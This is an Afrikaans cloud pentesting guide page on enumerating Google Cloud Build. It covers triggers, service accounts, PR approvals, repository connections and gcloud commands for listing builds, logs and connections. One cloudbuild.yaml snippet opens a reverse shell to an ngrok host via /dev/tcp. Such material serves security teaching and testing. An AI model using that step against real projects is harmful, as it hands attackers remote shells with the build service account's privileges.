GCP - Cloud Build Enum

Basiese Inligting

Google Cloud Build is 'n bestuurde CI/CD-platform wat sagteware bou en vrystellingsprosesse outomatiseer, wat integreer met bronkode-repositories en 'n wye verskeidenheid programmeertale ondersteun. Dit laat ontwikkelaars toe om kode outomaties te bou, te toets en te ontplooi terwyl dit buigsaamheid bied om boustappe en werkvloei aan te pas.

Elke Cloud Build Trigger is verwant aan 'n Cloud Repository of direk gekoppel aan 'n eksterne repository (Github, Bitbucket en Gitlab).

Gebeure

Die Cloud Build kan geaktiveer word as:

• Duw na 'n tak: Spesifiseer die tak

• Duw 'n nuwe etiket: Spesifiseer die etiket

• Pull versoek: Spesifiseer die tak wat die PR ontvang

• Handmatige Aanroep

• Pub/Sub boodskap: Spesifiseer die onderwerp

• Webhook gebeurtenis: Sal 'n HTTPS URL blootstel en die versoek moet geverifieer word met 'n geheim

Uitvoering

Daar is 3 opsies:

• 'n yaml/json wat die opdragte spesifiseer om uit te voer. Gewoonlik: /cloudbuild.yaml

• Slegs een wat “inline” in die webkonsol en in die cli gespesifiseer kan word

• Meest algemene opsie

• Relevant vir ongeverifieerde toegang

• 'n Dockerfile om te bou

• 'n Buildpack om te bou

SA Toestemmings

Die Diensrekening het die cloud-platform omvang, so dit kan alle voorregte gebruik. As geen SA gespesifiseer is (soos wanneer jy indien) sal die standaard SA <proj-number>@cloudbuild.gserviceaccount.com gebruik word.

Standaard word geen toestemmings gegee nie, maar dit is redelik maklik om dit 'n paar te gee:

Goedkeuringe

Dit is moontlik om 'n Cloud Build te konfigureer om goedkeuringe vir bou-uitvoerings te vereis (standaard gedeaktiveer).

PR Goedkeuringe

Wanneer die trigger 'n PR is omdat enige iemand PRs na openbare repositories kan uitvoer, sou dit baie gevaarlik wees om net die uitvoering van die trigger met enige PR toe te laat. Daarom sal die uitvoering standaard slegs outomaties wees vir eienaars en medewerkers, en om die trigger met ander gebruikers se PRs uit te voer, moet 'n eienaar of medewerker kommentaar lewer /gcbrun.

Verbindinge & Repositories

Verbindinge kan geskep word oor:

• GitHub: Dit sal 'n OAuth-prompt toon wat vra vir toestemmings om 'n Github token te verkry wat binne die Secret Manager gestoor sal word.

• GitHub Enterprise: Dit sal vra om 'n GithubApp te installeer. 'n authentikasie token van jou GitHub Enterprise gasheer sal geskep en in hierdie projek as 'n Secret Manager geheim gestoor word.

• GitLab / Enterprise: Jy moet die API-toegangstoken en die Lees API-toegangstoken verskaf wat in die Secret Manager gestoor sal word.

Sodra 'n verbinding gegenereer is, kan jy dit gebruik om repositories te koppel waartoe die Github-rekening toegang het.

Hierdie opsie is beskikbaar deur die knoppie:

Koppel 'n Repository

Dit is nie dieselfde as 'n verbinding nie. Dit laat verskillende maniere toe om toegang tot 'n Github of Bitbucket repository te verkry, maar genereer nie 'n verbindingsobjek nie, maar dit genereer wel 'n repository objek (van 1ste generasie).

Hierdie opsie is beskikbaar deur die knoppie:

Berging

Soms sal Cloud Build 'n nuwe berging genereer om die lêers vir die trigger te stoor. Dit gebeur byvoorbeeld in die voorbeeld wat GCP bied met:

git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
cd cloud-console-sample-build && \
gcloud builds submit --config cloudbuild.yaml --region=global

'n Stoor emmer genaamd security-devbox_cloudbuild is geskep om 'n .tgz met die lêers wat gebruik gaan word, te stoor.

Kry shell

steps:
- name: bash
script: |
#!/usr/bin/env bash
bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
options:
logging: CLOUD_LOGGING_ONLY

Installeer gcloud binne cloud build:

# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image
curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
mkdir -p /usr/local/gcloud
tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
/usr/local/gcloud/google-cloud-sdk/install.sh

Enumeration

Jy kan sensitiewe inligting in boukonfigurasies en logs vind.

# Get configured triggers configurations
gcloud builds triggers list # Check for the words github and bitbucket
gcloud builds triggers describe <trigger-name>

# Get build executions
gcloud builds list
gcloud builds describe <build-uuid> # Get even the build yaml if defined in there
gcloud builds log <build-uuid> # Get build logs

# List all connections of each region
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build connections in region: $region"
connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
if [[ ${#connections[@]} -eq 0 ]]; then
echo "No connections found in region $region."
else
for connection in $connections; do
echo "Describing connection $connection in region $region"
gcloud builds connections describe "$connection" --region="$region"
echo "-----------------------------------------"
done
fi
echo "========================================="
done

# List all worker-pools
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build worker-pools in region: $region"
gcloud builds worker-pools list --region="$region"
echo "-----------------------------------------"
done

Privilege Escalation

Unauthenticated Access

Post Exploitation